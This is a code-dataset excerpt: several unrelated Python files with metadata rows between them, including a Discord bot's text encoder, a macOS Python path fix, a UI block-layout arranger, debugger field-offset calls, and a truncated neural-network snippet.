decoder_result_content = discord.Embed(title=localization[1][14][0], color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value='```' + str(result) + '```', inline=True)
await msg.edit(embed=decoder_result_content)
async def encoder(bot, discord, message, botconfig, os, platform, datetime, one_result, localization, embed_color, args, binary, prefix):
if " ".join(args[2:]) == "" or " ".join(args[2:]) == " " or " ".join(args[2:]) == None:
no_args = discord.Embed(title=localization[1][14][0], description=str(localization[1][14][8]).format(prefix), color=embed_color)
return await message.channel.send(embed=no_args)
decoder_content = discord.Embed(title=localization[1][14][0], description=localization[1][14][2] + "\n\n" + localization[1][14][3], color=embed_color)
msg = await message.channel.send(embed=decoder_content)
await msg.add_reaction(emoji="1️⃣")
await msg.add_reaction(emoji="2️⃣")
await msg.add_reaction(emoji="3️⃣")
await msg.add_reaction(emoji="4️⃣")
@bot.event
async def on_reaction_add(reaction, user):
channel = reaction.message.channel
if reaction.emoji == "1️⃣" and user.id != bot.user.id:
try:
result = base64.standard_b64encode(" ".join(args[2:]).encode('ascii')).decode('ascii')
except:
result = localization[1][14][6]
decoder_result_content = discord.Embed(title=localization[1][14][0], color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value="```" + str(result) + "```", inline=True)
await msg.edit(embed=decoder_result_content)
if reaction.emoji == "2️⃣" and user.id != bot.user.id:
try:
result = base64.b32encode(" ".join(args[2:]).encode('ascii')).decode('ascii')
except:
result = localization[1][14][6]
decoder_result_content = discord.Embed(title=localization[1][14][0], color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value="```" + str(result) + "```", inline=True)
await msg.edit(embed=decoder_result_content)
if reaction.emoji == "3️⃣" and user.id != bot.user.id:
try:
result = base64.b16encode(" ".join(args[2:]).encode('ascii')).decode('ascii')
except:
result = localization[1][14][6]
decoder_result_content = discord.Embed(title=localization[1][14][0], color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value="```" + str(result) + "```", inline=True)
await msg.edit(embed=decoder_result_content)
if reaction.emoji == "4️⃣" and user.id != bot.user.id:
try:
args_str = " ".join(args[2:])
result = ""
for letter in list(args_str):
try:
result += binary.encode()[letter]
except Exception as e:
print(e)
result += ''
except Exception as e:
result = localization[1][14][6]
print(e)
try:
decoder_result_content = discord.Embed(title=localization[1][14][0], color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value='```' + str(result) + '```', inline=True)
await msg.edit(embed=decoder_result_content)
except:
decoder_result_content = discord.Embed(title=localization[1][14][0], color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value=localization[1][14][7], inline=True)
try:
await msg.edit(content=str('```' + str(result) + '```'), embed=decoder_result_content)
except:
await msg.edit(content='', embed=decoder_result_content)
async def get_help(bot, discord, message, botconfig, os, platform, datetime, one_result, localization, embed_color, prefix):
help_content = discord.Embed(title=localization[1][14][0], description=str(localization[1][14][5]).format(prefix), color=embed_color)
await message.channel.send(embed=help_content) | 59.824561 | 153 | 0.630792 | 900 | 6,820 | 4.691111 | 0.094444 | 0.120085 | 0.13856 | 0.053055 | 0.920417 | 0.898626 | 0.883468 | 0.870677 | 0.870677 | 0.867598 | 0 | 0.03875 | 0.197801 | 6,820 | 114 | 154 | 59.824561 | 0.727107 | 0 | 0 | 0.776786 | 0 | 0 | 0.027728 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017857 | 0 | 0.035714 | 0.026786 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ac612cbaeb47dc0fac701f74a47883595d4f8058 | 900 | py | Python | fix_brew_python.py | mpeyrotc/govector | 5429d538d0bcee4d95d9069dd397b3b5b35b504c | [
"MIT"
] | null | null | null | fix_brew_python.py | mpeyrotc/govector | 5429d538d0bcee4d95d9069dd397b3b5b35b504c | [
"MIT"
] | null | null | null | fix_brew_python.py | mpeyrotc/govector | 5429d538d0bcee4d95d9069dd397b3b5b35b504c | [
"MIT"
] | null | null | null | import sys
sys.path = [p for p in sys.path if 'Cellar' not in p]
new_path = ['/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python27.zip',
'/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7',
'/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-darwin',
'/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-mac',
'/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-mac/lib-scriptpackages',
'/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python',
'/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-tk',
'/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-old',
'/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload']
for p in new_path:
if p not in sys.path:
sys.path.append(p)
| 52.941176 | 101 | 0.772222 | 145 | 900 | 4.77931 | 0.213793 | 0.063492 | 0.298701 | 0.376623 | 0.777778 | 0.777778 | 0.777778 | 0.777778 | 0.708514 | 0.634921 | 0 | 0.039953 | 0.054444 | 900 | 16 | 102 | 56.25 | 0.774383 | 0 | 0 | 0 | 0 | 0.642857 | 0.798889 | 0.792222 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
ac764f1095a945abbf0f2a30fc09e4d92a7f669f | 27,768 | py | Python | element_layout.py | DiNOV-Tokyo/uied-d | c15d7e003dda13c24cfd0c17b4efb058dcc3b292 | [
"Apache-2.0"
] | null | null | null | element_layout.py | DiNOV-Tokyo/uied-d | c15d7e003dda13c24cfd0c17b4efb058dcc3b292 | [
"Apache-2.0"
] | null | null | null | element_layout.py | DiNOV-Tokyo/uied-d | c15d7e003dda13c24cfd0c17b4efb058dcc3b292 | [
"Apache-2.0"
] | null | null | null | import json
import element_reorder as er
# UIブロックの配置をリストで表現
# ブロック番号をリストの要素にして、リストの構成をそのまま、div, colで表現
# [[1,2],[3,4]],[5,6]
# 1と2、3と4は同じColumn。[1,2]と[3,4]、[5,6]は同じdiv
#with open(filename_element_json, mode='wt', encoding='utf-8') as fe:
# fe.writelines(element_list)
def layout_arrange(element_list):
block_layout = []
first_element_flg = True
for element in element_list:
next_loop_flg = False
element_json = json.loads(element)
cnt = len(block_layout)
print("========================================================================================")
print("block = " + str(element_json["block_num"]) + " Scan START : cnt = " + str(cnt))
# 一番最初のエレメントをまずリストに加える。
if first_element_flg:
block_layout.append(element_json["block_num"])
first_element_flg = False
else:
# cnt = len(block_layout)
idx = element_json["block_num"]
cnt_tmp = 0
not_in_list_flg = False
not_in_same_row_flg = True
in_same_row_flg = False
for block_num0 in block_layout:
print(block_num0)
block_num0_idx = block_layout.index(block_num0)
# 同じrow内で、どのcolに入るか調べる
if isinstance(block_num0, list):
cnt_tmp1 = 0
cnt1 = er.list_count(block_num0)
print("Show block")
print(block_num0)
print(type(block_num0))
# リストの中にリストがあるか? あれば、もう一回リストに入って作業
if er.isNextList(block_num0):
# 入れ子リストのカウンター
in_cnt = 0
for block_num1 in block_num0:
print(block_num0)
if isinstance(block_num1, list):
print("Deepest-LIST SCAN START")
block_list_send = block_num1
block_num1_idx = block_num0.index(block_num1)
block_list_return, in_same_row_flg, in_same_col_flg = er.deep_list_reorder(idx, block_list_send, element_list)
cnt_tmp1 = cnt_tmp1 + 1
cnt_tmp = cnt_tmp + 1
in_cnt = in_cnt + 1
if in_same_row_flg:
not_in_same_row_flg = False
if block_list_send == block_list_return:
if idx not in block_list_send:
not_in_list_flg = True
else:
not_in_list_flg = False
print("PASS")
pass
else:
next_loop_flg = True
block_num0.remove(block_num1)
block_num0.insert(block_num1_idx, block_list_return)
print(block_layout)
break
print("Deepest-LIST SCAN END")
# 同じrowでリストの最後につける
if not_in_list_flg and cnt_tmp1 == cnt1 and in_same_col_flg:
#cnt_tmp = cnt_tmp + 1
next_loop_flg = True
block_num0.append(idx)
break
else:
print("NOT Deepest-LIST SCAN START")
block_list_send = block_num0
block_list_return, in_same_row_flg, in_same_col_flg = er.list_reorder(idx, block_list_send, element_list)
print("block_list_return : " + str(idx) + " in_same_row_flg :" + str(in_same_row_flg) + " in_same_col_flg : " + str(in_same_col_flg))
cnt_tmp = cnt_tmp + 1
if in_same_row_flg:
not_in_same_row_flg = False
block_layout.remove(block_num0)
block_layout.insert(block_num0_idx, block_list_return)
print("HHHHHHHHH")
print(block_layout)
if block_list_send == block_list_return:
if idx not in block_list_send:
not_in_list_flg = True
else:
not_in_list_flg = False
pass
else:
next_loop_flg = True
not_in_list_flg = False
break
print("block_layout")
if next_loop_flg:
# next_loop_flg = False
break
else:
block_list_send = [block_num0]
block_list_return, in_same_row_flg, in_same_col_flg = er.list_reorder(idx, block_list_send, element_list)
cnt_tmp = cnt_tmp + 1
if in_same_row_flg:
not_in_same_row_flg = False
block_layout.remove(block_num0)
block_layout.insert(block_num0_idx, block_list_return)
if block_list_send == block_list_return:
if idx not in block_list_send:
not_in_list_flg = True
else:
not_in_list_flg = False
pass
else:
not_in_list_flg = False
break
# if next_loop_flg:
#3 next_loop_flg = False
# break
# print("block_layout")
# if next_loop_flg:
# next_loop_flg = False
# break
print("idx = " + str(idx) + " not_in_list_flg = " + str(not_in_list_flg) + " cnt_tmp = " + str(cnt_tmp) + " cnt = " + str(cnt))
# 同じrowでリストの最後につける
if not_in_list_flg and cnt_tmp >= cnt and not er.isInList(block_layout, idx):
# if not_in_list_flg and cnt_tmp == cnt:
print(block_layout)
# 同じrowにあるとき
if not not_in_same_row_flg:
print("[end] Same row")
#cnt_tmp = cnt_tmp + 1
#block_layout.append([idx])
if len(block_layout) == 1:
block_layout.append([idx])
else:
# block_layoutの形で次のレイアウトがきまる。
# [[*], [*]],[*] の時、[[*], [*]],[[*],[*]] にしたい。
# [*], [*], [*] の時、[*], [*], [*], [*] にしたい。
least_2_block = str(block_layout[len(block_layout)-2])
print(least_2_block)
if ']]' in least_2_block:
print("LEAST 2 Block")
least_block = block_layout[len(block_layout)-1]
print(least_block)
block_layout.remove(least_block)
print(block_layout)
block_layout.append([least_block, [idx]])
else:
print("Simple append")
block_layout.append([idx])
else:
# 次のrowに行くとき
print("[end] Different row")
block_layout = [block_layout, [idx]]
print("idx = " + str(element_json["block_num"]))
print(block_layout)
if "[[[" in str(block_layout):
pass
else:
block_layout = [block_layout]
return block_layout
def layout_arrange2(element_list):
block_layout = []
first_element_flg = True
for element in element_list:
next_loop_flg = False
element_json = json.loads(element)
cnt = len(block_layout)
print("========================================================================================")
print("block = " + str(element_json["block_num"]) + " Scan START : cnt = " + str(cnt))
# 一番最初のエレメントをまずリストに加える。
if first_element_flg:
block_layout.append([element_json["block_num"]])
print(block_layout)
n=input()
first_element_flg = False
else:
# cnt = len(block_layout)
idx = element_json["block_num"]
cnt_tmp = 0
not_in_list_flg = False
not_in_same_row_flg = True
in_same_row_flg = False
for block_num0 in block_layout:
print(block_num0)
block_num0_idx = block_layout.index(block_num0)
# 同じrow内で、どのcolに入るか調べる
if isinstance(block_num0, list):
cnt_tmp1 = 0
cnt1 = er.list_count(block_num0)
print("Show block")
print(block_num0)
print(type(block_num0))
# リストの中にリストがあるか? あれば、もう一回リストに入って作業
if er.isNextList(block_num0):
# 入れ子リストのカウンター
in_cnt = 0
for block_num1 in block_num0:
print(block_num0)
if isinstance(block_num1, list):
print("Deepest-LIST SCAN START")
block_list_send = block_num1
block_num1_idx = block_num0.index(block_num1)
block_list_return, in_same_row_flg, in_same_col_flg = er.deep_list_reorder(idx, block_list_send, element_list)
cnt_tmp1 = cnt_tmp1 + 1
cnt_tmp = cnt_tmp + 1
in_cnt = in_cnt + 1
if in_same_row_flg:
not_in_same_row_flg = False
if block_list_send == block_list_return:
if idx not in block_list_send:
not_in_list_flg = True
else:
not_in_list_flg = False
print("PASS")
pass
else:
next_loop_flg = True
block_num0.remove(block_num1)
block_num0.insert(block_num1_idx, block_list_return)
print(block_layout)
break
print("Deepest-LIST SCAN END")
# 同じrowでリストの最後につける
if not_in_list_flg and cnt_tmp1 == cnt1 and in_same_col_flg:
#cnt_tmp = cnt_tmp + 1
next_loop_flg = True
block_num0.append(idx)
break
else:
print("NOT Deepest-LIST SCAN START")
block_list_send = block_num0
block_list_return, in_same_row_flg, in_same_col_flg = er.list_reorder(idx, block_list_send, element_list)
print("block_list_return : " + str(idx) + " in_same_row_flg :" + str(in_same_row_flg) + " in_same_col_flg : " + str(in_same_col_flg))
cnt_tmp = cnt_tmp + 1
if in_same_row_flg:
not_in_same_row_flg = False
block_layout.remove(block_num0)
block_layout.insert(block_num0_idx, block_list_return)
print("HHHHHHHHH")
print(block_layout)
if block_list_send == block_list_return:
if idx not in block_list_send:
not_in_list_flg = True
else:
not_in_list_flg = False
pass
else:
next_loop_flg = True
not_in_list_flg = False
break
print("block_layout")
if next_loop_flg:
# next_loop_flg = False
break
else:
block_list_send = [block_num0]
block_list_return, in_same_row_flg, in_same_col_flg = er.list_reorder(idx, block_list_send, element_list)
cnt_tmp = cnt_tmp + 1
if in_same_row_flg:
not_in_same_row_flg = False
block_layout.remove(block_num0)
block_layout.insert(block_num0_idx, block_list_return)
if block_list_send == block_list_return:
if idx not in block_list_send:
not_in_list_flg = True
else:
not_in_list_flg = False
pass
else:
not_in_list_flg = False
break
print("idx = " + str(idx) + " not_in_list_flg = " + str(not_in_list_flg) + " cnt_tmp = " + str(cnt_tmp) + " cnt = " + str(cnt))
# 同じrowでリストの最後につける
if not_in_list_flg and cnt_tmp >= cnt and not er.isInList(block_layout, idx):
print(block_layout)
# 同じrowにあるとき
if not not_in_same_row_flg:
print("[end] Same row")
if len(block_layout) == 1:
block_layout.append([idx])
else:
# block_layoutの形で次のレイアウトがきまる。
# [[*], [*]],[*] の時、[[*], [*]],[[*],[*]] にしたい。
# [*], [*], [*] の時、[*], [*], [*], [*] にしたい。
least_2_block = str(block_layout[len(block_layout)-2])
print(least_2_block)
if ']]' in least_2_block:
print("LEAST 2 Block")
least_block = block_layout[len(block_layout)-1]
print(least_block)
block_layout.remove(least_block)
print(block_layout)
block_layout.append([least_block, [idx]])
else:
print("Simple append")
block_layout.append([idx])
else:
# 次のrowに行くとき
print("[end] Different row")
block_layout = [block_layout, [idx]]
print("idx = " + str(element_json["block_num"]))
print(block_layout)
if "[[[" in str(block_layout):
pass
else:
block_layout = [block_layout]
return block_layout
def layout_number(element_list, block_layout):
div_num = 0
col_num = 0
element_result = []
cnt = 0
for k in block_layout:
if isinstance(k, list):
for m in k:
if isinstance(m, list):
for n in m:
element_json = json.loads(element_list[n])
element_json["block_num"] = cnt
element_json["div_num"] = div_num
element_json["col_num"] = col_num
element_result.append(element_json)
cnt = cnt + 1
else:
element_json = json.loads(element_list[m])
element_json["block_num"] = cnt
element_json["div_num"] = div_num
element_json["col_num"] = col_num
element_result.append(element_json)
cnt = cnt + 1
col_num = col_num + 1
else:
element_json = json.loads(element_list[k])
element_json["block_num"] = cnt
element_json["div_num"] = div_num
element_json["col_num"] = col_num
element_result.append(element_json)
cnt = cnt + 1
div_num = div_num + 1
col_num = 0
return element_result
def all_layout_reorder(element_list):
block_layout = []
first_element_flg = True
for element in element_list:
element_json = json.loads(element)
# 一番最初のエレメントをまずリストに加える。
if first_element_flg:
block_layout.append([[element_json["block_num"]]])
first_element_flg = False
print(block_layout)
else:
idx = element_json["block_num"]
# すでに作ったblockの中にあるかどうか?
is_in_block_flg = False
cnt_row = 0
no_row = len(block_layout)
# block_layout の row を検討していく
for block_rows in block_layout:
print("\n\n==========================================")
print("今から ============")
print(block_rows)
print("について、==========")
print("\t block_row idx= " + str(idx))
print("を調べます。============\n")
cnt_row = cnt_row + 1
is_in_block_flg, block_layout_return, in_same_row_flg, in_same_col_flg, is_forehead_flg = row_layout_reorder(idx, block_rows, element_list, is_in_block_flg)
print("diff _ all")
print("[cnt_row / no_row] ; is_in_block_flg, in_same_row_flg, in_same_col_flg, is_forehead_flg : [" + str(cnt_row) + " / " + str(no_row) + "] ; " + str(is_in_block_flg) + " : " + str(in_same_row_flg) + " : " + str(in_same_col_flg) + " : " + str(is_forehead_flg) )
print(block_layout_return)
print(block_rows)
print(block_layout_return != block_rows)
if block_layout_return != block_rows:
index0 = block_layout.index(block_rows)
block_layout.remove(block_rows)
block_layout.insert(index0, block_layout_return)
else:
if not in_same_row_flg and is_forehead_flg:
print("[cnt_row / no_row] ; is_in_block_flg, in_same_row_flg, in_same_col_flg, is_forehead_flg : [" + str(cnt_row) + " / " + str(no_row) + "] ; " + str(is_in_block_flg) + " : " + str(in_same_row_flg) + " : " + str(in_same_col_flg) + " : " + str(is_forehead_flg) )
print("ここに入っている?")
if cnt_row != no_row:
if not is_in_block_flg:
index0 = block_layout.index(block_rows)
block_layout.remove(block_rows)
block_layout.insert(index0, [[idx]])
is_in_block_flg = True
block_layout.insert(index0+1, block_rows)
else:
block_layout.remove(block_rows)
if not is_in_block_flg:
block_layout.append([[idx]])
is_in_block_flg = True
block_layout.append(block_rows)
elif not in_same_row_flg and cnt_row == no_row:
if not is_in_block_flg:
block_layout.append([[idx]])
is_in_block_flg = True
print("最終Blockの途中経過 block_row_layout end " + str(idx))
print(block_layout)
return block_layout
def row_layout_reorder(idx, block_rows, element_list, is_in_block_flg):
block_layout_row = []
cnt_col = 0
no_col = len(block_rows)
print(block_rows)
# block_layout の cols を検討していく
for block_col in block_rows:
cnt_col = cnt_col + 1
print("考える colはこちら ---------------")
print(block_col)
print("\t idx は " + str(idx) + "-----------")
is_in_block_flg, block_layout_return, in_same_row_flg, in_same_col_flg, is_forehead_flg = col_layout_reorder(idx, block_col, element_list, is_in_block_flg)
print("diff _ row")
print("[cnt_col / no_col] ; is_in_block_flg, in_same_row_flg, in_same_col_flg, is_forehead_flg : [" + str(cnt_col) + " / " + str(no_col) + "] ; " + str(is_in_block_flg) + " : " + str(in_same_row_flg) + " : " + str(in_same_col_flg) + " : " + str(is_forehead_flg) )
print(block_layout_return)
print(block_col)
print(block_layout_return == block_col)
if block_layout_return != block_col and not is_forehead_flg:
block_layout_row.append(block_layout_return)
print("Row block のここです 1")
elif block_layout_return != block_col and is_forehead_flg:
if block_col in block_layout_row:
block_layout_row.remove(block_col)
block_layout_row.append(block_layout_return)
block_layout_row.append(block_col)
print("Row block のここです 2")
else:
if in_same_row_flg and cnt_col == no_col and not is_forehead_flg:
block_layout_row.append(block_layout_return)
if not is_in_block_flg:
block_layout_row.append([idx])
is_in_block_flg = True
print("Row block のここです 3")
elif in_same_row_flg and cnt_col == no_col and is_forehead_flg:
if not is_in_block_flg:
block_layout_row.append([idx])
is_in_block_flg = True
block_layout_row.append(block_layout_return)
print("Row block のここです 4")
elif in_same_row_flg and is_forehead_flg:
if not is_in_block_flg:
block_layout_row.append([idx])
is_in_block_flg = True
block_layout_row.append(block_layout_return)
print("Row block のここです 5")
elif not in_same_row_flg and is_forehead_flg:
print("[cnt_col / no_col] ; is_in_block_flg, in_same_row_flg, in_same_col_flg, is_forehead_flg : [" + str(cnt_col) + " / " + str(no_col) + "] ; " + str(is_in_block_flg) + " : " + str(in_same_row_flg) + " : " + str(in_same_col_flg) + " : " + str(is_forehead_flg) )
print("Row block のここです 6")
block_layout_row.append(block_col)
#break
else:
block_layout_row.append(block_col)
print("Row block のここです 7")
print("Row block の途中経過= ")
print(block_layout_row)
print("return block_layout row = ")
print(block_layout_row)
return is_in_block_flg, block_layout_row, in_same_row_flg, in_same_col_flg, is_forehead_flg
# idx : 検討するブロック番号
# block_col : 検討するブロックのリスト
# element_list : ブロックの全リスト
# return : idx のブロックが含まれたリスト
# Col のリスト生成
def col_layout_reorder(idx, block_col, element_list, is_in_block_flg):
block_layout_col = []
# 検討する要素を読み込む
block_idx_json = json.loads(element_list[idx])
# 同じrowにあるかどうかのflg
in_same_row_flg = False
# 同じcolumnにあるかどうかのflg
in_same_col_flg = False
# 調査中の要素より前にあるかどうかのflg
is_forehead_flg = False
# 前回の調査で、調査中の要素より前にあるかどうかのflg
pre_is_forehead_flg = False
# 調査した要素数
no_cnt = 0
# 調査するCol リスト内の総要素数
print(block_col)
no_elemt = len(block_col)
for i in block_col:
block_comp_json = json.loads(element_list[i])
no_cnt = no_cnt + 1
# 以下の評価方法、評価基準は、要見直し!!!
# 同じrowに入っているか? この判断は難しい・・・・
if (abs(block_comp_json["block_height_center"] - block_idx_json["block_height_center"]) < 200) or (abs(block_comp_json["block_top"] - block_idx_json["block_top"]) < 30) or (abs(block_comp_json["block_bottom"] - block_idx_json["block_bottom"]) < 30):
in_same_row_flg = True
diff_val = 80
if (block_comp_json["block_top"] - block_idx_json["block_bottom"]) > diff_val or (block_idx_json["block_top"] - block_comp_json["block_bottom"]) > diff_val :
in_same_row_flg = False
else:
in_same_row_flg = False
# 同じcolumnに入っているか?
if (abs(block_comp_json["block_left"] - block_idx_json["block_left"]) < 40) or (abs(block_comp_json["block_width_center"] - block_idx_json["block_width_center"]) < 120) :
in_same_col_flg = True
# 前後関係の検出
if block_comp_json["block_top"] > block_idx_json["block_bottom"] and abs(block_comp_json["block_top"] - block_idx_json["block_bottom"]) < 300:
# 調査中のブロックが、ループを回して走査しているブロックより前にある
is_forehead_flg = True
print("ここか? 1")
elif block_comp_json["block_bottom"] < block_idx_json["block_top"] and abs(block_comp_json["block_bottom"] - block_idx_json["block_top"]) < 300:
# 調査中のブロックが、ループを回して走査しているブロックより後ろにある
is_forehead_flg = False
# 同じcolumnに入っていなくて、先にある。
elif (block_comp_json["block_top"] > block_idx_json["block_bottom"]) and (block_comp_json["block_right"] > block_idx_json["block_left"]):
is_forehead_flg = True
print("ここか? 2")
print("comp = " + str(block_comp_json["block_num"]) + " idx = " + str(block_idx_json["block_num"]))
print("top = " + str(block_comp_json["block_top"]) + " Bottom = " + str(block_idx_json["block_bottom"]))
# 同じcolumnに入っていなくて、先にある。
elif (block_comp_json["block_left"] > block_idx_json["block_right"]) and (block_comp_json["block_bottom"] > block_idx_json["block_bottom"]) :
is_forehead_flg = True
print("ここか? 3")
# 同じcolumnに入っていなくて、後にある。
else:
is_forehead_flg = False
in_same_col_flg = False
# block_layout に要素を入力
# 全col要素を検査終わっていないが、すでに要素の順番が確定したときの処理
# 同じrow, 同じcol, 前後が確定したとき
if in_same_row_flg and in_same_col_flg and not pre_is_forehead_flg and is_forehead_flg:
block_layout_col.append(idx)
block_layout_col.append(i)
is_in_block_flg = True
break
block_layout_col.append(i)
pre_is_forehead_flg = is_forehead_flg
# block_layout に要素を入力
# 全col要素を検査終わったときの処理
# 同じrow, 同じcolにあり、
if in_same_row_flg and in_same_col_flg and no_cnt == no_elemt and not is_in_block_flg:
# block_layout の中をすべて検査し終わったとき
if not is_forehead_flg:
# 後にあり・・・
block_layout_col.append(idx)
is_in_block_flg = True
else:
# 前にあり・・・
block_layout_col.remove(i)
block_layout_col.append(idx)
block_layout_col.append(i)
is_in_block_flg = True
print("return block_layout col = ")
print(block_layout_col)
print("==========================")
return is_in_block_flg, block_layout_col, in_same_row_flg, in_same_col_flg, is_forehead_flg
| 39.220339 | 292 | 0.492113 | 2,997 | 27,768 | 4.14648 | 0.06373 | 0.120383 | 0.03766 | 0.050213 | 0.838658 | 0.783777 | 0.758751 | 0.738795 | 0.725678 | 0.716424 | 0 | 0.010617 | 0.41998 | 27,768 | 707 | 293 | 39.275813 | 0.760338 | 0.069829 | 0 | 0.768085 | 0 | 0 | 0.089052 | 0.009631 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012766 | false | 0.021277 | 0.004255 | 0 | 0.029787 | 0.214894 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cbf2fe0c8974e25aab48b065f745e473fbf7dbc6 | 230 | py | Python | samples/py/fieldOffset.py | alexbudmsft/dbgscript | 76dc77109bbeb8f09a893e9dd56012ff8a4b601f | [
"PSF-2.0"
] | 27 | 2015-11-05T22:19:34.000Z | 2021-08-21T02:03:52.000Z | samples/py/fieldOffset.py | alexbudmsft/dbgscript | 76dc77109bbeb8f09a893e9dd56012ff8a4b601f | [
"PSF-2.0"
] | null | null | null | samples/py/fieldOffset.py | alexbudmsft/dbgscript | 76dc77109bbeb8f09a893e9dd56012ff8a4b601f | [
"PSF-2.0"
] | 2 | 2015-11-06T04:32:31.000Z | 2016-08-22T18:24:20.000Z | print(dbgscript.field_offset('nt!GUID', 'Data1')) # -> 0
print(dbgscript.field_offset('nt!GUID', 'Data2')) # -> 4
print(dbgscript.field_offset('nt!GUID', 'Data3')) # -> 6
print(dbgscript.field_offset('nt!GUID', 'Data4')) # -> 8 | 57.5 | 57 | 0.66087 | 32 | 230 | 4.625 | 0.4375 | 0.378378 | 0.513514 | 0.675676 | 0.837838 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0.038462 | 0.095652 | 230 | 4 | 58 | 57.5 | 0.673077 | 0.082609 | 0 | 0 | 0 | 0 | 0.235294 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
021a8e3c760b276e4305d7e5836142f11f0e465d | 98 | py | Python | inheritance/zoo/project/bear.py | lowrybg/PythonOOP | 1ef5023ca76645d5d96b8c4fb9a54d0f431a1947 | [
"MIT"
] | null | null | null | inheritance/zoo/project/bear.py | lowrybg/PythonOOP | 1ef5023ca76645d5d96b8c4fb9a54d0f431a1947 | [
"MIT"
] | null | null | null | inheritance/zoo/project/bear.py | lowrybg/PythonOOP | 1ef5023ca76645d5d96b8c4fb9a54d0f431a1947 | [
"MIT"
] | null | null | null | from project.animal import Animal
from project.mammal import Mammal
class Bear(Mammal):
pass | 16.333333 | 33 | 0.785714 | 14 | 98 | 5.5 | 0.571429 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163265 | 98 | 6 | 34 | 16.333333 | 0.939024 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
0222cbaa0838daed453e8dc40151327213f8eaf1 | 122 | py | Python | src/open_large/helper/__init__.py | schmelczer/open-s3 | afa000f371403a1162897647123d8fadcdb4db9a | [
"MIT"
] | 2 | 2022-01-27T15:43:43.000Z | 2022-01-30T21:42:49.000Z | src/open_large/helper/__init__.py | schmelczer/open-s3 | afa000f371403a1162897647123d8fadcdb4db9a | [
"MIT"
] | null | null | null | src/open_large/helper/__init__.py | schmelczer/open-s3 | afa000f371403a1162897647123d8fadcdb4db9a | [
"MIT"
] | null | null | null | from .create_file_progress_bar import create_file_progress_bar
from .human_readable_to_byte import human_readable_to_byte
| 40.666667 | 62 | 0.918033 | 20 | 122 | 5 | 0.5 | 0.2 | 0.36 | 0.42 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065574 | 122 | 2 | 63 | 61 | 0.877193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
023a4f15eab9668867610aad47e99cd4bb778e72 | 805 | py | Python | Machine learning/Reinforcement Learning/sueca-master/python/nn/nn_main.py | vascobailao/Python | 37473ab5c9629b77f0b618737473276716df4e4f | [
"MIT"
] | null | null | null | Machine learning/Reinforcement Learning/sueca-master/python/nn/nn_main.py | vascobailao/Python | 37473ab5c9629b77f0b618737473276716df4e4f | [
"MIT"
] | null | null | null | Machine learning/Reinforcement Learning/sueca-master/python/nn/nn_main.py | vascobailao/Python | 37473ab5c9629b77f0b618737473276716df4e4f | [
"MIT"
] | null | null | null | from nn.pyBrainNN import NeuralNetwork
import numpy as np
NN = NeuralNetwork()
input = np.array([0., 0., 0., 0., 0., 0. , 0., 0. , 0. , 0. , 0., 0. , 0. , 0., 0. , 1. , 0., 0.,
